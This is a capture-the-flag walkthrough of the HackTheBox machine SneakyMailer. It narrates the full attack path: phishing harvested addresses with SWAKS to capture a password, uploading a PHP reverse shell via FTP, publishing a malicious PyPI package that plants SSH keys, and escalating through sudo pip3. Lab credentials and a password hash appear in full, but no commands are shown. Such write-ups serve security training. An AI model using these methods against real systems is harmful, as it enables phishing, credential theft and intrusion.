SneakyMailer — HTB Walktrough
What ?? Another part of Sneaky HTB box ??? Might be. But was fun to solve it. Real life phishing attack practice. User part was definitely a level up. Let’s start.
ENUMERATION
Full port nmap scan for TCP ports reveals following
PORT 21 FTP Enumeration
— — anonymous login failed
PORT 80 HTTP ENUMERATION
Visiting website
Add to /etc/hosts
We get 3 info
— — Pip install can install python modules on server
— — We have to read mails for further exploitation
— — We get some username in teams and messages
Viewing source code we can see messages
Teams
Now normal enumeration like directory busting and all , gave us nothing of importance.
Failed Logics:
1) I am getting nothing on HTTP — gobuster etc.
2) I tried SMTP enum , it would be basically using username files and testing which exits, doing this won’t be of use I guess, because we already have users from HTTP port.
3) IMAP — to read mails, I need to login as any user , I don’t have creds of any till now
4) ftp anonymous login failed :(
Now what can we do? This box asks us to think logically. What about email harvesting and phishing attempt. Since we already have harvested emails by PORT 80 HTTP enumeration. We can now try to send some phishing mails. Let’s see how.
PORT 25 SMTP ENUMERATION
First of all let’s collect a list of emails and users separately.
EXPLOITATION
We will use SWAKS (can be downloaded from github) , to send the mails . For this first open netcat at port 80. We will send a phishing mail to users, to click on the link containing link to our IP, even if a single one clicks, we may get something juicy.
While on netcat at port 80 we can see, the user Paul reverted us back
Username : Paul && Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
I used evolution client for kali to see mails
Setup Evolution, by signing in as paul, to read mails, using his email and his password we got just now.
Mails
Hello administrator, I want to change this password for the developer account. Username: developer && Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C ;Please notify me when you do it
another mail is about python and PyPI.
The password worked for ftp we got worked for FTP
FTP Enumeration
Login in FTP using above username password
Register.php
I initially thought of registering as a user via curl request, but no we don’t have to do it . It is a rabbit hole.
Then what? can we upload files on server using PUT, I used php-reverse-shell by pentest monkey
But where to access it ??? time for subdomains and directory bursting. But we have already busted directories, so we can look for subdomains.
Wfuzzing sub domains I got dev.sneakycorp.htb
POST EXPLOITATION
Now that we are www-data, it’s time to get user
Let’s enumerate.We already know what it is in dev.sneakycorp.htb- the same content we see in ftp, now we see pypi.sneakycorp.htb — something new
Username: pypi
Password hash : $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Seems april hash; Let’s crack it using hashcat
Let’s see what is happening on port 8080,which was open
Lot’s of connection on localhost:8080, Also on visitng pypi.sneakycorp.htb:8080/, I see
When I tried to access packages , I see we require to authenticate as user: pypi
Let’s use the creds we have
Seems no package is there.Same with “simple”
https://packaging.python.org/tutorials/packaging-projects/#generating-distribution-archives
Let’s create a package in tmp directory
Nano and Vi did not work , so I made these files on my system and wget it.
First create a pair of ssh keys so that you can ssh into low, using your private key.
Wget all files under sample_package. Contents must look like this.
/README.md and /setup.cfg
/Setup.py and /sample_package/__init__.py
Now that our package is ready, we need to deploy it
1) compress it using sdist
Create a .pypirc in HOME folder
For this first export HOME folder to /tmp/sample_package : requirement of pypirc is it should be in home folder of user. Then wget the file as previous ones.
We see we have keys added to our low’s home directory
Ssh into low
PRIVILEGE ESCALATION
Easiest part of whole machine was escalating privilege.
We can exploit sudo on pip , using gtfobins
After a thinking a lot, I see that we can run pip3 not pip as sudo.
ROOTED!!!